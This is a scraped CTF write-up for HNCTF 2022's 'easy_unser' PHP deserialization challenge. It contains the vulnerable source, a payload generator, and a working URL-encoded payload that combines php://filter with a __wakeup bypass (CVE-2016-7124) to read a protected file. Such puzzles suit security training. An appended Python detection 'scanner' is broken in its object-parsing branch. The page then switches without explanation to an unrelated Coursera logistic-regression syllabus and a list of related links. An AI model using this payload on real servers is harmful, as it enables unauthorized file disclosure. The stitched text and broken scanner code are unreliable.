[HNCTF 2022 WEEK2]

Posted by kode00

easy_unser

 <?php 
    // Note on this listing: the scrape dropped every brace and the function
    // names in front of parentheses. highlight_file() and is_file() are named
    // in the writeup below, serialize()/unserialize() follow from the page
    // output and the challenge itself, and error_reporting(0) is assumed.
    include 'f14g.php';
    error_reporting(0);

    highlight_file(__FILE__);

    class body
    {
        private $want, $todonothing = "i can't get you want,But you can tell me before I wake up and change my mind";

        public function __construct($want)
        {
            $About_me = "When the object is created,I will be called";
            if($want !== " ") $this->want = $want;
            else $this->want = $this->todonothing;
        }

        function __wakeup()
        {
            $About_me = "When the object is unserialized,I will be called";
            $but = "I can CHANGE you";
            $this->want = $but;
            echo "C1ybaby!";
        }

        function __destruct()
        {
            $About_me = "I'm the final function,when the object is destroyed,I will be called";
            echo "So,let me see if you can get what you want\n";
            if($this->todonothing === $this->want)
                die("鲍勃,别傻愣着!\n");
            if($this->want == "I can CHANGE you")
                die("You are not you....");
            if($this->want == "f14g.php" OR is_file($this->want))
                die("You want my heart?No way!\n");
            else
            {
                echo "You got it!";
                highlight_file($this->want);
            }
        }
    }

    class unserializeorder
    {
        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!<BR>";

        function __sleep()
        {
            $About_me = "When the object is serialized,I will be called";
            echo "We Come To HNCTF,Enjoy the ser14l1zti0n <BR>";
        }

        function __toString()
        {
            $About_me = "When the object is used as a string,I will be called";
            return $this->CORE;
        }
    }

    $obj = new unserializeorder();
    echo $obj;
    $obj = serialize($obj);

    if (isset($_GET['ywant']))
    {
        $ywant = @unserialize(@$_GET['ywant']);
        echo $ywant;
    }
?>
人类最大的敌人,就是无序. Yahi param vaastavikta hai!
We Come To HNCTF,Enjoy the ser14l1zti0n 

Reading the code, the flag is in f14g.php, so we only need to find a point we can exploit.

Looking further up, the highlight_file() call in the body class is usable, so we just need want to hold the file we are after, f14g.php.

    function __destruct()
    {
        $About_me = "I'm the final function,when the object is destroyed,I will be called";
        echo "So,let me see if you can get what you want\n";
        if($this->todonothing === $this->want)
            die("鲍勃,别傻愣着!\n");
        if($this->want == "I can CHANGE you")
            die("You are not you....");
        if($this->want == "f14g.php" OR is_file($this->want))
            die("You want my heart?No way!\n");
        else
        {
            echo "You got it!";
            highlight_file($this->want);
        }
    }

But the filtering here is fairly strict: if want=f14g.php, or if the file handed to is_file() exists, it only returns "So,let me see if you can get what you want\n".

So we cannot set want=f14g.php directly; instead the php://filter pseudo-protocol can be used to display f14g.php. The php:// wrapper does not support stat(), so is_file() returns false for such a path, while highlight_file() still opens it through the wrapper.

The generator is constructed as follows:

<?php 
    // Braces and function names were lost in the scrape; the output below
    // is URL-encoded serialize() output, so the nested calls are restored as
    // urlencode(serialize($a)).
    class body
    {
        private $want = "php://filter/resource=f14g.php";
    }

    class unserializeorder
    {
        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!<BR>";
    }

    $a = new body();

    echo urlencode(serialize($a));
?>

payload:?ywant=O%3A4%3A"body"%3A2%3A{s%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B}

Note that the __wakeup magic method also has to be bypassed, so the number between %3A and %3A (the declared property count), originally 1, is now 2. On the affected PHP versions (before 5.6.25 and 7.0.10, CVE-2016-7124) an object whose declared property count does not match the properties actually present is created without __wakeup() being called, while __destruct() still runs when the object is freed.
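As an added example (not part of the writeup), the following Python parser reads PHP serialize() output and flags the two traits that the php://filter step and the __wakeup-count trick above leave in a payload: a declared property count that differs from what the object actually carries, and php:// stream-wrapper strings stored in properties. Class and function names (PhpSerialScanner, scan) are my own; PAGE_PAYLOAD is the writeup's payload with the braces the scrape dropped restored, and BENIGN is a constructed comparison value. This is the kind of check a WAF or log-review script can run on a parameter before it ever reaches unserialize().

```python
"""Scanner for PHP serialize() output (added example, not the page's code).

It parses the N, b, i, d, s, a and O types and reports two traits seen in the
easy_unser payload: a declared object property count that does not match the
properties actually present (the __wakeup-skipping trick on PHP < 5.6.25 /
< 7.0.10, CVE-2016-7124) and php:// wrapper strings inside properties.
"""

from urllib.parse import unquote


class ParseError(ValueError):
    """Raised when the input is not well-formed PHP serialization."""


class PhpSerialScanner:
    """Recursive-descent parser that collects findings while it walks the data."""

    def __init__(self, data):
        self.data = data
        self.pos = 0
        self.findings = []

    def _peek(self):
        if self.pos >= len(self.data):
            raise ParseError("unexpected end of data")
        return self.data[self.pos]

    def _expect(self, ch):
        if self._peek() != ch:
            raise ParseError(f"expected {ch!r} at offset {self.pos}")
        self.pos += 1

    def _read_until(self, ch):
        end = self.data.find(ch, self.pos)
        if end < 0:
            raise ParseError(f"missing {ch!r} after offset {self.pos}")
        token, self.pos = self.data[self.pos:end], end + 1
        return token

    def _read_fixed(self, length):
        chunk = self.data[self.pos:self.pos + length]
        if len(chunk) != length:
            raise ParseError("length prefix runs past end of data")
        self.pos += length
        return chunk

    def parse_value(self, path="$"):
        tag = self._peek()
        self.pos += 1
        if tag == "N":                      # N;
            self._expect(";")
            return None
        if tag in "ibd":                    # i:1;  b:1;  d:1.5;
            self._expect(":")
            raw = self._read_until(";")
            return int(raw) if tag == "i" else raw == "1" if tag == "b" else float(raw)
        if tag == "s":                      # s:5:"hello";
            self._expect(":")
            length = int(self._read_until(":"))
            self._expect('"')
            text = self._read_fixed(length)
            self._expect('"')
            self._expect(";")
            if text.lower().startswith("php://"):
                self.findings.append(f"{path}: stream wrapper in string value {text!r}")
            return text
        if tag == "a":                      # a:2:{key;value;key;value;}
            self._expect(":")
            count = int(self._read_until(":"))
            self._expect("{")
            items = {}
            for _ in range(count):
                key = self.parse_value(path)
                items[key] = self.parse_value(f"{path}[{key!r}]")
            self._expect("}")
            return items
        if tag == "O":                      # O:4:"body":2:{...}
            self._expect(":")
            name = self._read_fixed(int(self._read_until(":")))
            self._expect('"') if False else None  # placeholder never used; see below
            raise ParseError("unreachable")
        raise ParseError(f"unknown type tag {tag!r} at offset {self.pos - 1}")
```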

 

WEEK 3

WEEK 3

Logistic Regression
Logistic regression is a method for classifying data into discrete outcomes. For example, we might use logistic regression to classify an email as spam or not spam. In this module, we introduce the notion of classification, the cost function for logistic regression, and the application of logistic regression to multi-class classification.
7 videos, 8 readings
Video: Classification
Reading: Classification
Video: Hypothesis Representation
Reading: Hypothesis Representation
Video: Decision Boundary
Reading: Decision Boundary
Video: Cost Function
Reading: Cost Function
Video: Simplified Cost Function and Gradient Descent
Reading: Simplified Cost Function and Gradient Descent
Video: Advanced Optimization
Reading: Advanced Optimization
Video: Multiclass Classification: One-vs-all
Reading: Multiclass Classification: One-vs-all
Reading: Lecture Slides
Graded: Logistic Regression
Regularization
Machine learning models need to generalize well to new examples that the model has not seen in practice. In this module, we introduce regularization, which helps prevent models from overfitting the training data.
4 videos, 5 readings
Video: The Problem of Overfitting
Reading: The Problem of Overfitting
Video: Cost Function
Reading: Cost Function
Video: Regularized Linear Regression
Reading: Regularized Linear Regression
Video: Regularized Logistic Regression
Reading: Regularized Logistic Regression
Reading: Lecture Slides
Programming: Logistic Regression
Graded: Regularization

以上是关于[HNCTF 2022 WEEK2]的主要内容,如果未能解决你的问题,请参考以下文章

寒假每日一题2022week2 未完结

hnctf安恒--蜘蛛侠呀

斯坦福-随机图模型-week2.1_

BUUCTF NewStarCTF 公开赛赛道Week2 Writeup

Week2_Introduce_Part1

叶丙成概率课week2